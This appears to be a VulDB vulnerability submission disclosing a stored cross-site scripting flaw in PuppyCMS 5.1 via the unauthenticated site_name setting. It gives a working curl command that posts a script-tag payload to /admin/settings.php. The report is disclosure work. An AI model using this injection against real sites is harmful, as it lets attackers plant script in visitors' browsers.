जमा करें #48008: PuppyCMS >= 5.1 - Cross-site Scripting Storedजानकारी

शीर्षकPuppyCMS >= 5.1 - Cross-site Scripting Stored
विवरण# Exploit Title: PuppyCMS >= 5.1 - Cross-site Scripting Stored # Date: 2022-10-11 # Exploit Author: Mr Empy # Vendor Homepage: https://github.com/choregus # Software Link: https://github.com/choregus/puppyCMS # Version: >= 5.1 # Tested on: Linux Title: ================ PuppyCMS >= 5.1 - Cross-site Scripting Stored Summary: ================ PuppyCMS versions below or equal to 5.1 are vulnerable to a Cross-site Scripting Stored exploit, which allows the injection of arbitrary Javascript code through the site_name parameter without authentication. Exploitation can be used to manipulate the capabilities of victims' browsers. Severity Level: ================ 5.8 (Medium) CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N Affected Product: ================ PuppyCMS >= v5.1 Steps to Reproduce: ================ 1. Open your terminal and run this command: TARGET="http://x.x.x.x/puppyCMS";XSS_PAYLOAD='<script>alert("PuppyCMS XSS")</script>';curl "$TARGET/admin/settings.php" -X POST -d "site_name=$XSS_PAYLOAD&site_root=/&password=&password-repeat=&site_template=top-nav-red&from_email=your%40email.com&submit=Submit"
स्रोत⚠️ https://github.com/choregus/puppyCMS
उपयोगकर्ता
 mrempy (UID 24379)
सबमिशन12/10/2022 03:24 AM (4 साल पहले)
संयम12/10/2022 11:25 AM (8 hours later)
स्थितिस्वीकृत
VulDB प्रविष्टि210699 [puppyCMS तक 5.1 /admin/settings.php site_name क्रॉस साइट स्क्रिप्टिंग]
अंक20

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!